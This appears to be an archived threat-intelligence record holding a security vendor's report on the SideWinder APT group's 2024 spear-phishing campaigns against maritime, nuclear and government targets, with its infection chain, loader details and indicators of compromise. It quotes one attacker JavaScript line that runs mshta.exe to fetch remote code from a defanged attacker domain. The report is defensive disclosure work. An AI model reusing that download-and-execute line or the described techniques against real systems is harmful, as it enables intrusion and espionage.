{
	"id": "7dd8b997-a0eb-46d9-9c11-61d531cd238e",
	"created_at": "2026-04-06T00:13:42.886925Z",
	"updated_at": "2026-04-10T03:37:20.221049Z",
	"deleted_at": null,
	"sha1_hash": "417cf90b80b99d6168d4f464d12984ff6a0146f3",
	"title": "SideWinder targets the maritime and nuclear sectors with an updated toolset",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 808366,
	"plain_text": "SideWinder targets the maritime and nuclear sectors with an\r\nupdated toolset\r\nBy Giampaolo Dedola\r\nPublished: 2025-03-10 · Archived: 2026-04-05 14:36:58 UTC\r\nLast year, we published an article about SideWinder, a highly prolific APT group whose primary targets have been\r\nmilitary and government entities in Pakistan, Sri Lanka, China, and Nepal. In it, we described activities that had\r\nmostly happened in the first half of the year. We tried to draw attention to the group, which was aggressively\r\nextending its activities beyond their typical targets, infecting government entities, logistics companies and\r\nmaritime infrastructures in South and Southeast Asia, the Middle East, and Africa. We also shared further\r\ninformation about SideWinder’s post-exploitation activities and described a new sophisticated implant designed\r\nspecifically for espionage.\r\nWe continued to monitor the group throughout the rest of the year, observing intense activity that included updates\r\nto SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control\r\ncompromised systems. The targeted sectors were consistent with those we had seen in the first part of 2024, but\r\nwe noticed a new and significant increase in attacks against maritime infrastructures and logistics companies.\r\nIn 2024, we initially observed a significant number of attacks in Djibouti. 
Subsequently, the attackers shifted their\r\nfocus to other entities in Asia and showed a strong interest in targets within Egypt.\r\nMoreover, we observed other attacks that indicated a specific interest in nuclear power plants and nuclear energy\r\nin South Asia and further expansion of activities into new countries, especially in Africa.\r\nhttps://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/\r\nPage 1 of 10\n\nCountries and territories targeted by SideWinder in the maritime and logistics sectors in 2024\r\nIt is worth noting that SideWinder constantly works to improve its toolsets, stay ahead of security software\r\ndetections, extend persistence on compromised networks, and hide its presence on infected systems. Based on our\r\nobservation of the group’s activities, we presume they are constantly monitoring detections of their toolset by\r\nsecurity solutions. Once their tools are identified, they respond by generating a new and modified version of the\r\nmalware, often in under five hours. If behavioral detections occur, SideWinder tries to change the techniques used\r\nto maintain persistence and load components. Additionally, they change the names and paths of their malicious\r\nfiles. Thus, monitoring and detection of the group’s activities reminds us of a ping-pong game.\r\nInfection vectors\r\nThe infection pattern observed in the second part of 2024 is consistent with the one described in the previous\r\narticle.\r\nInfection flow\r\nThe attacker sends spear-phishing emails with a DOCX file attached. The document uses the remote template\r\ninjection technique to download an RTF file stored on a remote server controlled by the attacker. 
The file exploits\r\na known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process\r\nthat leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for\r\n“StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.\r\nThe documents used various themes to deceive victims into believing they are legitimate.\r\nSome documents concerned nuclear power plants and nuclear energy agencies.\r\nMalicious documents related to nuclear power plants and energy\r\nMany others concerned maritime infrastructures and various port authorities.\r\nMalicious documents relating to maritime infrastructures and different port authorities\r\nIn general, the detected documents predominantly concerned governmental decisions or diplomatic issues. Most\r\nof the attacks were aimed at various national ministries and diplomatic entities.\r\nWe also detected various documents that covered generic topics. 
For example, we found a document with\r\ninformation on renting a car in Bulgaria, a document expressing an intent to buy a garage, and another document\r\noffering a freelance video game developer a job working on a 3D action-adventure game called “Galactic\r\nOdyssey”.\r\nExamples of generic malicious documents\r\nRTF exploit\r\nThe exploit file contained a shellcode, which had been updated by the attacker since our previous research, but the\r\nmain goal remained the same: to run embedded JavaScript code invoking the mshtml.RunHTMLApplication\r\nfunction.\r\nIn the new version, the embedded JavaScript runs the Windows utility mshta.exe and obtains additional code from\r\na remote server:\r\njavascript:eval(\"var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe\r\nhttps://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();\")\r\nThe newer version of the shellcode still uses certain tricks to avoid sandboxes and complicate analysis, although\r\nthey differ slightly from those in past versions.\r\nIt uses the GlobalMemoryStatusEx function to determine the size of RAM.\r\nIt attempts to load the nlssorting.dll library and terminates execution if the operation succeeds.\r\nJavaScript loader\r\nThe RTF exploit led to the execution of the mshta.exe Windows utility, abused to download a malicious HTA from\r\na remote server controlled by the attacker.\r\nmshta.exe hxxps://dgtk.depo-govpk[.]com/19263687/trui\r\nThe remote HTA embeds a heavily obfuscated JavaScript file that loads further malware, the “Downloader\r\nModule”, into memory.\r\nThe JavaScript loader operates in two stages. The first stage begins execution by loading various strings, initially\r\nencoded with a substitution algorithm and stored as variables. It then checks the installed RAM and terminates if\r\nthe total size is less than 950 MB. 
Otherwise, the previously decoded strings are used to load the second stage.\r\nThe second stage is another JavaScript file. It enumerates the subfolders at\r\nWindows%\\Microsoft.NET\\Framework\\ to find the version of the .NET framework installed on the system and\r\nuses the resulting value to configure the environment variable COMPLUS_Version.\r\nFinally, the second stage decodes and loads the Downloader Module, which is embedded within its code as a\r\nbase64-encoded .NET serialized stream.\r\nDownloader Module\r\nThis component is a .NET library used to collect information about the installed security solution and download\r\nanother component, the “Module Installer”. These components were already described in the previous article and\r\nwill not be detailed again here.\r\nIn our latest investigation, we discovered a new version of the app.dll Downloader Module, which includes a more\r\nsophisticated function for identifying installed security solutions.\r\nIn the previous version, the malware used a simple WMI query to obtain a list of installed products. The new\r\nversion uses a different WMI query, which collects the name of the antivirus and the related “productState”.\r\nFurthermore, the malware compares all running process names against an embedded dictionary. The dictionary\r\ncontains 137 unique process names associated with popular security solutions.\r\nThe WMI query is executed only when no Kaspersky processes are running on the system.\r\nBackdoor Loader\r\nThe infection chain concludes with the installation of malware that we have named “Backdoor Loader”, a library\r\nconsistently sideloaded using a legitimate and signed application. Its primary function is to load the “StealerBot”\r\nimplant into memory. 
Both the “Backdoor Loader” and “StealerBot” were thoroughly described in our prior\r\narticle, but the attacker has distributed numerous variants of the loader in recent months, whereas the implant has\r\nremained unchanged.\r\nIn the previous campaign, the “Backdoor Loader” library was designed to be loaded by two specific programs. For\r\ncorrect execution, it had to be stored on victims’ systems under one of the following names:\r\nDuring the most recent campaign, the attackers tried to diversify the samples, generating many other variants\r\ndistributed under the following names:\r\nJetCfg.dll\r\npolicymanager.dll\r\nwinmm.dll\r\nxmllite.dll\r\ndcntel.dll\r\nUxTheme.dll\r\nThe new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening\r\nmore extensively to evade detection.\r\nDuring the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic\r\nis the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks\r\nanti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were\r\nconfigured to load the second stage from a specific file path embedded in the code, which also included the user’s\r\nname. Example:\r\nC:\\Users\\[REDACTED]\\AppData\\Roaming\\valgrind\\[REDACTED FILE NAME].[REDACTED\r\nEXTENSION]\r\nIt indicates that these variants were likely used after the infection phase and manually deployed by the attacker\r\nwithin the already compromised infrastructure, after validating the victim.\r\nVictims\r\nSideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. 
The\r\ntargeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of\r\nattacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.\r\nFurthermore, we observed attacks against entities associated with nuclear energy. The following industries were\r\nalso affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.\r\nCountries and territories targeted by SideWinder in 2024\r\nOverall, the group has further extended its activities, especially in Africa. We detected attacks in Austria,\r\nBangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri\r\nLanka, the United Arab Emirates, and Vietnam.\r\nIn this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria,\r\nChina, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.\r\nConclusion\r\nSideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic\r\ninfection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again\r\nemphasizes the critical importance of installing security patches.\r\nDespite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already\r\ndemonstrated its ability to compromise critical assets and high-profile entities, including those in the military and\r\ngovernment. We know the group’s software development capabilities, which became evident when we observed\r\nhow quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore,\r\nwe know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot”\r\ndescribed in our previous article. 
These capabilities make them a highly advanced and dangerous adversary.\r\nTo protect against such attacks, we strongly recommend maintaining a patch management process to apply\r\nsecurity fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky\r\nVulnerability Data Feed) and using a comprehensive security solution that provides incident detection and\r\nresponse, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any\r\ncomplexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial\r\nattack vector, which highlights the importance of regular employee training and awareness programs for corporate\r\nsecurity.\r\nWe will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective\r\ndetection of malware.\r\n***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky\r\nIntelligence Reporting Service. 
Contact: intelreports@kaspersky.com.\r\nIndicators of compromise\r\nMicrosoft Office Documents\r\ne9726519487ba9e4e5589a8a5ec2f933\r\nd36a67468d01c4cb789cd6794fb8bc70\r\n313f9bbe6dac3edc09fe9ac081950673\r\nbd8043127abe3f5cfa61bd2174f54c60\r\ne0bce049c71bc81afe172cd30be4d2b7\r\n872c2ddf6467b1220ee83dca0e118214\r\n3d9961991e7ae6ad2bae09c475a1bce8\r\na694ccdb82b061c26c35f612d68ed1c2\r\nf42ba43f7328cbc9ce85b2482809ff1c\r\nBackdoor Loader\r\n0216ffc6fb679bdf4ea6ee7051213c1e\r\n433480f7d8642076a8b3793948da5efe\r\nDomains and IPs\r\npmd-office[.]info\r\nmodpak[.]info\r\ndirctt888[.]info\r\nmodpak-info[.]services\r\npmd-offc[.]info\r\ndowmloade[.]org\r\ndirctt888[.]com\r\nportdedjibouti[.]live\r\nmods[.]email\r\ndowmload[.]co\r\ndownl0ad[.]org\r\nd0wnlaod[.]com\r\nd0wnlaod[.]org\r\ndirctt88[.]info\r\ndirectt88[.]com\r\nfile-dwnld[.]org\r\ndefencearmy[.]pro\r\ndocument-viewer[.]info\r\naliyum[.]email\r\nd0cumentview[.]info\r\ndebcon[.]live\r\ndocument-viewer[.]live\r\ndocumentviewer[.]info\r\nms-office[.]app\r\nms-office[.]pro\r\npncert[.]info\r\nsession-out[.]com\r\nzeltech[.]live\r\nziptec[.]info\r\ndepo-govpk[.]com\r\ncrontec[.]site\r\nmteron[.]info\r\nmevron[.]tech\r\nveorey[.]live\r\nmod-kh[.]info\r\nSource: https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/"
	],
	"report_names": [
		"115847"
	],
	"threat_actors": [
		{
			"id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e",
			"created_at": "2023-01-06T13:46:39.080551Z",
			"updated_at": "2026-04-10T02:00:03.206572Z",
			"deleted_at": null,
			"main_name": "RAZOR TIGER",
			"aliases": [
				"APT-C-17",
				"T-APT-04",
				"SideWinder"
			],
			"source_name": "MISPGALAXY:RAZOR TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b9fc913-06c6-4432-8c58-86a3ac614564",
			"created_at": "2022-10-25T16:07:24.185236Z",
			"updated_at": "2026-04-10T02:00:04.893541Z",
			"deleted_at": null,
			"main_name": "SideWinder",
			"aliases": [
				"APT-C-17",
				"APT-Q-39",
				"BabyElephant",
				"G0121",
				"GroupA21",
				"HN2",
				"Hardcore Nationalist",
				"Rattlesnake",
				"Razor Tiger",
				"SideWinder",
				"T-APT-04"
			],
			"source_name": "ETDA:SideWinder",
			"tools": [
				"BroStealer",
				"Capriccio RAT",
				"callCam"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "173f1641-36e3-4bce-9834-c5372468b4f7",
			"created_at": "2022-10-25T15:50:23.349637Z",
			"updated_at": "2026-04-10T02:00:05.3486Z",
			"deleted_at": null,
			"main_name": "Sidewinder",
			"aliases": [
				"Sidewinder",
				"T-APT-04"
			],
			"source_name": "MITRE:Sidewinder",
			"tools": [
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434422,
	"ts_updated_at": 1775792240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/417cf90b80b99d6168d4f464d12984ff6a0146f3.pdf",
		"text": "https://archive.orkl.eu/417cf90b80b99d6168d4f464d12984ff6a0146f3.txt",
		"img": "https://archive.orkl.eu/417cf90b80b99d6168d4f464d12984ff6a0146f3.jpg"
	}
}